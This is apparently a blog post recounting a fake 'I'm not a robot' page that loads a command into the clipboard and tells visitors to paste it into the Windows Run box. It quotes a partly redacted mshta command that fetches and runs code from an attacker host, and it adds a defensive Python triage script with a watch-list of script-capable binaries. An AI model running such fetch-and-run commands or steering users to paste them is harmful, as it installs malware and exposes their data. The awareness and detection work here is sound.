I was on a perfectly normal-looking website, having reached the page through Google Search, and I was about to read an article when a familiar box popped up: “I’m not a robot.”
So far, so good. We’ve all seen that.
But after I clicked, a second screen appeared with big bold Verification steps:
- Press Windows Key + R
- Press Ctrl + V
- Press Enter
At first glance, it looks “official”, like the puzzles we get from, say, Microsoft, or many other social media sites. But read those steps carefully: a web page asking you to press the Windows key (a system shortcut), open the Run box, paste something that was not shown to you before, and execute it.
That is not human verification. That is social engineering.
The engineer in me got curious. Windows Key + R opens the Run dialog. A normal web page has no business telling you to open that. Then Ctrl + V means “paste whatever is in your clipboard”, and Enter means “run it”. Somewhere earlier in the flow, the page has quietly stuffed a command into your clipboard. Security researchers have documented entire malware campaigns built around this exact trick, usually using a Windows utility called mshta to download and run code from an attacker‑controlled website.
Instead of following the instructions, I opened Notepad and pressed Ctrl + V there. Sure enough, my clipboard contained a long command starting with something like:
mshta http://****.*****.coupons/x64
In plain English: “Run this Windows program and make it fetch and execute something from our server.” That “something” can be password‑stealing malware, a remote‑control tool, or any nasty surprise of the attacker’s choice.
Security researchers call this the ClickFix technique. It manipulates users into copying, pasting, and running malicious commands through fake verification prompts. It is often bundled with phishing or fake brand pages to lower suspicion.
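For anyone who wants to automate the Notepad check, here is an added example (not code from any tool mentioned in this post). It triages text pasted from the clipboard, or entries exported from the Run dialog history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The watch-list of binaries, the function names and the sample strings are assumptions made for the example.

```python
import re

# mshta is the utility named in this post; the rest is an assumed watch-list
# of Windows binaries that can fetch or run remote content.
SCRIPT_HOSTS = {"mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
                "rundll32", "regsvr32", "msiexec", "curl", "bitsadmin", "certutil"}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)

def normalise(entry: str) -> str:
    """Trim whitespace and the trailing '\\1' marker that RunMRU values carry."""
    entry = entry.strip()
    return entry[:-2] if entry.endswith("\\1") else entry

def first_program(command: str) -> str:
    """Base name of the launched program, lower-cased, without path or .exe."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    if not m:
        return ""
    name = re.split(r"[\\/]", m.group(1) or m.group(2))[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def triage(entry: str) -> dict:
    """Flag a command that pairs a script-capable binary with a remote URL."""
    command = normalise(entry)
    program = first_program(command)
    urls = REMOTE_URL.findall(command)
    reasons = []
    if program in SCRIPT_HOSTS:
        reasons.append(f"launches script-capable binary '{program}'")
    if urls:
        reasons.append(f"references remote location {urls[0]}")
    return {"program": program,
            "suspicious": program in SCRIPT_HOSTS and bool(urls),
            "reasons": reasons}

# Constructed samples: the first mirrors the shape of the command described
# above, with a placeholder host instead of the redacted one.
SAMPLES = ["mshta http://example.invalid/x64",
           r'"C:\Windows\System32\mshta.exe" https://example.invalid/a\1',
           r"notepad\1",
           "cmd /c echo hello"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", triage(sample))
```

A hit means the entry deserves a closer look by a person; a miss does not prove the entry is harmless.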
At that point, the article I wanted to read was irrelevant. I closed the browser tab, cleared recent data, and moved on. The site, or the ad network behind it, is almost certainly compromised.

What should you do?
Here are a few simple rules I want you to remember and share with your family, colleagues, and teams:
- A genuine CAPTCHA will never ask you to press Windows Key + R, open the Run dialog, or type/paste system commands. If you see that, stop immediately.
- Never execute commands you don’t fully understand—whether they arrive via a web page, email, WhatsApp forward, or “support” chat.
- If something feels odd, take a screenshot, close the tab, and ask someone you trust or your favourite AI assistant before doing anything.
- If you followed such instructions by mistake, disconnect from the internet, back up your data to an offline drive, run a full antivirus scan, and, if possible, have a professional inspect the machine.
Big Tech has trained us to mindlessly “prove we are human” all day long—clicking buses, solving tiny puzzles, doing KYC, Re‑KYC, and “quick verifications”. That conditioning is exactly what attackers are now exploiting. They wrap their tricks in familiar UI, and our brains just comply.
As founders, leaders, and builders in this post‑AI world, we have to recognise this pattern. Every “verification step” we design teaches users a habit—good or bad. If we don’t think through the unintended consequences, someone else will weaponise those habits against our users.
For now, if you see a CAPTCHA that asks you to press Windows + R, paste, and hit Enter, treat it like a live wire. Close it. Walk away. Your data, and your peace of mind, are worth far more than whatever was on that page.

